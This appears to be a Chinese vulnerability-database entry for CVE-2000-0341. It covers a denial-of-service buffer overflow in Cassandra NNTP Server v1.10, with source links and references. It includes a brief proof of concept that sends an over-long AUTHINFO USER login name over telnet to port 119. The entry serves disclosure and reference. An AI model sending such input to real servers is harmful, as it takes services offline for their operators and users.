Cassandra NNTPServer v1.10远程缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105809 漏洞类型 未知
发布时间 2000-05-01 更新时间 2005-05-02
CVE编号 CVE-2000-0341 CNNVD-ID CNNVD-200005-003
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/19884
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-003
|漏洞详情
CassandraNNTP是一个新闻组服务器程序。CassandraNNTP实现上存在一个缓冲区溢出漏洞,远程攻击者可能利用此漏洞对服务器程序进行拒绝服务攻击。CassandraNNTPv1.10server软件在处理登陆信息时没有进行正确的长度检查,当用户输入一个长度超过10000字节的登陆名时,将导致NNTPServer停止响应,直到管理员重新启动此应用程序。
|漏洞EXP
source: http://www.securityfocus.com/bid/1156/info

Unchecked buffer exists in the code that handles login information in Cassandra NNTP v1.10 server. Entering a login name that consists of over 10 000 characters will cause the server to stop responding until the administrator restarts the application.

[host$ telnet target 119
Trying target...
Connected to target.
Escape character is '^]'.
200 CASSANDRA NNTP-Server (v1.10.01 Unregistered) for Windows 95 ready at Mon, 1
May 2000 xx:xx:xx +-300 (posting allowed) 

AUTHINFO USER <10 000 character string>


Where buffer is 10000 characters.
|参考资料

来源:BID
名称:1156
链接:http://www.securityfocus.com/bid/1156
来源:NTBUGTRAQ
名称:20000501RemoteDoSattackinCASSANDRANNTPServerv1.10fromATRIUM
链接:http://marc.theaimsgroup.com/?l=ntbugtraq&m=95736106504870&w=2
来源:NSFOCUS
名称:486
链接:http://www.nsfocus.net/vulndb/486